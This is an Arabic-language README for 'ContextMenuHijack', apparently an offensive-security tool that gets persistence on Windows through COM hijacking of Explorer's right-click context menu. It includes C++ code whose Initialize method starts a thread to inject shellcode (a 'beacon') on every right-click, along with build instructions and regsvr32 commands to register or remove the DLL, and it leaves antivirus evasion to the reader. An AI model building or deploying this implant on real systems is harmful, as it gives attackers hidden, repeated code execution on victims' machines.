
نفّذ حمولة (payload) عند كل نقرة بزر الفأرة الأيمن على ملف/مجلد في قائمة مستكشف الملفات (Explorer) لتحقيق الثبات (persistence).
الفكرة الأصلية التي ألهمتني هي من @NinjaParanoid :
ContextMenuHijack هي تقنية استمرارية بسيطة تستخدم اختطاف COM بناءً على سلوك المستخدم، فعند النقر بزر الماوس الأيمن على ملف/مجلد في مستكشف الملفات لفتح قائمة السياق، يتم تنفيذ الـ beacon الذي حددناه في الوقت نفسه.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
كل ما عليك فعله هو تحميل ملف الحل (.sln) وبناؤه. من المهم معرفة أنك بحاجة إلى صلاحيات المسؤول لاستخدام تقنية الاستمرارية هذه. بعد القيام بكل ذلك، كل ما عليك هو تسجيل ملف DLL في السجل باستخدام regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
إذا أردت إلغاء تثبيته، استخدم فقط العلم
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe، والأمر متروك لك لاستخدام أساليب التهرب الخاصة بك